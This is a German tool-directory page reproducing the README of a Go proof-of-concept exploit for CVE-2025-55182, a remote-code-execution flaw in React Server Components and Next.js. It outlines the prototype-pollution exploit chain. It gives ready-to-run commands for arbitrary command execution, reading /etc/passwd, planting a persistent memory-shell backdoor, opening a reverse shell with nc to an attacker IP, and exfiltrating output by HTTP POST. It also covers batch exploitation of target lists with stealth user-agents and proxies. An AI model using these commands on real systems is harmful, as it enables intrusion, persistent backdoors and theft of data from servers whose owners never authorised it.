Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182-golang-PoC — Go-basierter Proof-of-Concept für CVE-2025-55182, eine kritische RCE in React Server Components. Enthält Schwachstellenprüfung, Befehlsausführung, Memory-Shell-Injection, Reverse Shell, Batch-Scanning und Proxy-Unterstützung für autorisierte Sicherheitstests. | Kitploit
Tools/GitHubGitHub/keklick1337/cve-2025-55182-golang-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPost-ExploitationPenetrationstestsCommand and ControlRed TeamingRemote-Access-ToolPayload-Entwicklung
GitHubkeklick1337/cve-2025-55182-golang-poc

CVE-2025-55182-golang-PoC

Go-basierter Proof-of-Concept für CVE-2025-55182, eine kritische RCE in React Server Components. Enthält Schwachstellenprüfung, Befehlsausführung, Memory-Shell-Injection, Reverse Shell, Batch-Scanning und Proxy-Unterstützung für autorisierte Sicherheitstests.

Repository anzeigenWebseite
619vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182 React Server Components RCE - Go PoC

⚠️ NUR FÜR AUTORISIERTE SICHERHEITSTESTS ⚠️

Beschreibung

CVE-2025-55182 (auch bekannt als CVE-2025-66478) ist eine kritische Remote-Code-Ausführungs-Schwachstelle in React Server Components (Flight-Protokoll). Dieses Tool ist eine Go-Implementierung des PoC für Sicherheitsforschung und autorisierte Penetrationstests.

Betroffene Versionen:

  • react-server-dom-webpack: 19.0.0 - 19.2.0
  • Next.js: 15.x (vor Patches: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7)
  • Next.js: 16.x (vor 16.0.7)
  • Next.js: 14.3.0-canary.77 und spätere Canary-Versionen

Schwachstellendetails

Der Exploit nutzt Prototype Pollution in der Flight-Protokoll-Deserialisierung aus:

  1. Verwendet die $@-Deserialisierung, um eine Chunk-Referenz zu erhalten
  2. Setzt Chunk.prototype.then als die then-Eigenschaft des Root-Objekts
  3. Setzt den Status auf RESOLVED_MODEL, um initializeModelChunk mit einem kontrollierten Fake-Chunk aufzurufen
  4. Löst die Blob-Deserialisierung aus, die response._formData.get mit der Angreifer-Nutzlast aufruft
  5. Setzt response._formData.get auf den Function-Konstruktor für beliebige Codeausführung

Funktionen

  • Vollständige RCE-Fähigkeit - Ausführen beliebiger Befehle mit Ausgabe
  • Schwachstellenprüfmodus - Sichere Erkennung ohne Ausnutzung
  • Next.js-Versionserkennung - Automatische Version-Fingerabdrücke
  • Memory-Shell-Injektion - Permanenter Backdoor unter /exec?cmd=
  • Batch-Scanning - Multithreaded-Scanning mit JSON-Ausgabe
  • Umfassende Proxy-Unterstützung:
    • SOCKS5 mit/ohne Authentifizierung
    • SOCKS4/SOCKS4a
    • HTTP/HTTPS-Proxy mit/ohne Authentifizierung
  • Stealth-Modus - Browser-, Crawler- und Security-User-Agents
  • Ratenbegrenzung - Konfigurierbare Verzögerungen zwischen Anfragen
  • Reverse-Shell - mkfifo + nc (funktioniert auf Alpine/busybox)
  • Datenexfiltration - POST-Befehlsausgabe an Angreifer-Server
  • Plattformübergreifende Builds - Über 30 Betriebssystem-/Architektur-Kombinationen
  • JSON-Ausgabe - Maschinenlesbare Ergebnisse für Automatisierung

Installation

Vorgefertigte Binärdateien

Laden Sie die neueste Version für Ihre Plattform von den GitHub-Releases herunter.

Verfügbare Binärdateien:

  • Linux: amd64, 386, arm, arm64, mips, mipsle, mips64, riscv64, ppc64, s390x
  • Windows: amd64, 386, arm64
  • macOS: amd64 (Intel), arm64 (Apple Silicon)
  • FreeBSD, OpenBSD, NetBSD: amd64, 386, arm, arm64
  • Und weitere...

Aus dem Quellcode

# Clone repository
git clone https://github.com/keklick1337/CVE-2025-55182-golang-PoC.git
cd CVE-2025-55182-golang-PoC

# Build for current platform
go build -o cve-2025-55182 .

# Or build for all platforms
chmod +x build.sh
./build.sh

Aus dem Quellcode erstellen

Nach dem Ausführen von ./build.sh stehen die Binärdateien im Verzeichnis build/ für alle unterstützten Plattformen zur Verfügung.

Verwendung

Grundlegende Befehle

# Check single target for vulnerability
./cve-2025-55182 -u http://target:3000 --check

# Detect Next.js version
./cve-2025-55182 -u http://target:3000 --version-check

# Execute command with output
./cve-2025-55182 -u http://target:3000 -c "id"
./cve-2025-55182 -u http://target:3000 -c "cat /etc/passwd"

Memory-Shell (Permanenter Backdoor)

# Inject memory shell (checks if already installed first)
./cve-2025-55182 -u http://target:3000 --memshell

# Test if memory shell is active
./cve-2025-55182 -u http://target:3000 --test-shell

# Execute command via memory shell
./cve-2025-55182 -u http://target:3000 --shell-exec "cat /etc/passwd"

# After injection, you can also use curl directly:
curl 'http://target:3000/exec?cmd=id'
curl 'http://target:3000/exec?cmd=whoami'

Benutzerdefinierte Header & SSL-Umgehung

# Add custom headers (can be used multiple times)
./cve-2025-55182 -u http://target:3000 --check -H 'Authorization: Bearer token123'
./cve-2025-55182 -u http://target:3000 --check -H 'Host: example.com' -H 'X-Forwarded-For: 127.0.0.1'

# Skip SSL certificate verification (for self-signed certs)
./cve-2025-55182 -u https://target:3000 --check -k
./cve-2025-55182 -u https://target:3000 --check --insecure

# Combine with other options
./cve-2025-55182 -u https://target:3000 -c "id" -k -H 'Cookie: session=abc123' --proxy socks5://127.0.0.1:1080

Proxy-Unterstützung

# SOCKS5 with authentication
./cve-2025-55182 -u http://target:3000 --check --proxy socks5://user:[email protected]:1080

# SOCKS5 without authentication
./cve-2025-55182 -u http://target:3000 --check --proxy socks5://127.0.0.1:1080

# SOCKS4 proxy
./cve-2025-55182 -u http://target:3000 --check --proxy socks4://127.0.0.1:1080

# HTTP proxy
./cve-2025-55182 -u http://target:3000 --check --proxy http://127.0.0.1:8080

Batch-Scanning

# Batch check from file
./cve-2025-55182 --urls targets.txt --check

# Batch scan with JSON output
./cve-2025-55182 --urls targets.txt --check --json -o results.json

# Batch scan with multiple threads and stealth
./cve-2025-55182 -f targets.txt --check --threads 20 --stealth crawler --delay 2s

# Save vulnerable targets to file
./cve-2025-55182 -f targets.txt --check -o vulnerable.txt

# Batch memory shell injection
./cve-2025-55182 --urls targets.txt --memshell --workers 10

# Batch command execution
./cve-2025-55182 --urls targets.txt -c "id" --threads 5

Netzwerk-Exfiltration

# Reverse shell (mkfifo + nc, works on Alpine)
./cve-2025-55182 -u http://target:3000 --revshell 10.0.0.1 4444

# Start listener on attacker machine first:
nc -lvnp 4444

# Exfiltrate command output via HTTP POST
./cve-2025-55182 -u http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444

# Start listener: nc -lvnp 4444

Optionen

OptionBeschreibung
-u, --urlZiel-URL (z.B. http://localhost:3000)
-f, --fileDatei mit Ziel-URLs (eine pro Zeile)
--urlsAlias für -f/--file
-o, --outputAusgabedatei für verwundbare Ziele
--jsonErgebnisse im JSON-Format ausgeben
-c, --commandAuszuführender Befehl (mit Ausgabe)
--checkAuf Schwachstelle prüfen
--version-checkNext.js-Version erkennen
--proxyProxy URL (socks5://user:pass@ip:port, socks4://ip:port, http://ip:port)
-H, --headerBenutzerdefinierter Header (mehrfach verwendbar)
-k, --insecureSSL/TLS-Zertifikatsprüfung überspringen
--stealthStealth-Modus: browser, crawler, security (Standard: browser)
--delayVerzögerung zwischen Anfragen (z.B. 2s, 500ms)
--variantsMehrere Payload-Varianten für gründliche Prüfung verwenden
--memshellMemory-Shell injizieren (permanenter Backdoor)
--test-shellTesten, ob Memory-Shell aktiv ist
--shell-execBefehl über Memory-Shell ausführen
--revshell IP PORTReverse-Shell herstellen
--exfil CMD IP PORTBefehl ausführen und Ausgabe per POST senden
-t, --timeoutTimeout für Anfragen in Sekunden (Standard: 15)
--threadsAnzahl gleichzeitiger Threads (Standard: 10)
--workersAlias für --threads
--nocolorFarbausgabe deaktivieren (für Windows/Pipes)
-h, --helpHilfemeldung anzeigen
-v, --versionVersion anzeigen

Proxy Types

socks5://user:pass@ip:port  - SOCKS5 with authentication
socks5://ip:port            - SOCKS5 without authentication  
socks5h://ip:port           - SOCKS5 with remote DNS resolution
socks4://ip:port            - SOCKS4 proxy
socks4a://ip:port           - SOCKS4a proxy
http://user:pass@ip:port    - HTTP proxy with authentication
http://ip:port              - HTTP proxy without authentication
https://ip:port             - HTTPS proxy

Stealth-Modi

Tool herunterladen